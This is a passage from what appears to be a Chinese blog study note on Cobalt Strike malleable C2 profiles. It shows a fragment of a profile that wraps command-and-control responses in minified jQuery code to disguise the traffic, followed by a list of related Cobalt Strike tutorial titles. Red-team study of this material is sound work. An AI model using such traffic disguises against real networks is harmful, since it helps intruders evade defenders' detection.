e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";# 1st Lineprepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";print;}}
}http post 请求,和get请求配置差不多。
博客原文
Cobalt Strike Profile 学习记录相关推荐
- cobalt strike profile
cobalt strike 配置解读 此处以最新版 jquery-c2.4.3.profile文件解析 适应Cobalt Strike 4.3 版本 其他版本会有标注 cobalt strike 4. ...
- Cobalt Strike折腾踩坑填坑记录
文章目录 0X00 背景 0x01 基础原理 0x02 关于破戒 Exit暗桩 0x03 CDN+反代隐藏Teamserver Domain Fronting Proxy 0x04 DNS上线 一个未 ...
- 反制学习:Cobalt Strike批量上线
更新时间:2022.01.04 微信公众号:乌鸦安全 扫取二维码获取更多信息! 参考文档: https://forum.butian.net/share/708 1. 反制:Cobalt Stri ...
- cobalt strike 的基础使用
cobalt strike 的基础使用 本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源自于靶场练习,仅供学习参考 ...
- Cobalt Strike入门使用
作者:h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS. 0x0 ...
- DAY41:Cobalt Strike 工具使用
DAY41:Cobalt Strike 工具使用 1.Cobalt Strike 概述 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器. 自 3.0 以后已 ...
- APT组织最喜欢的工具 Cobalt Strike (CS) 实战
一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...
- Cobalt Strike 使用指南(资源整合笔记)
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列.因其优良的团队协作性,被冠以多人运动的必备利器. 本文将网络上各路神仙的经验分享以渗透流程为依据进行了一次整合, ...
- Cobalt Strike使用教程——基础篇
本文主要介绍 Cobalt Strike 4.3 的基本功能及使用方法,具体分析和实战中使用放在另一篇讲解:Cobalt Strike使用方法--实战篇. 文章目录 一.基本介绍 (一) 目录结构 ( ...
- Cobalt Strike基本使用
Cobalt Strike简介 Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台 ...
最新文章
- 【 FPGA 】数字系统设计方法的演变
- C语言中常用的数学公式
- Java系列笔记(1) - Java 类加载与初始化
- linux临时挂载别的文件目录_linux基础05:linux系统目录有哪些?命令行界面如何切换目录?...
- 给 axios 和 redux-axios-middleware 添加finally方法 的使用心得
- linux中GIT组件,linux – 使用git和符号链接的基于组件的Web项目目录布局
- AviSynth——强大的视频文件后期处理工具
- 收集的材料 关于数据库和抓取器方面的
- mysql建表语句转oracle_MYSQL事务他快你慢,都是你自己惹的祸
- iOS开发常用的RGB色值
- 热敏打印机解析(非热转印)
- 双系统彻底删除Ubuntu启动项
- C语言实现洛谷题库中的 P1125 [NOIP2008 提高组] 笨小猴
- python脚本王者荣耀自动刷金币
- 三维地理信息系统应用的关注要点
- 算法---排序--希尔排序和快速排序
- 静态创意和动态创意_8种独特且价格合理的名片的创意
- 申请百度文字识别APIkey和Secret Key+文字验证码识别案例
- 如何在Linux下安装chrome浏览器
- PTA 10-43 计算xsda表中最矮同学的身高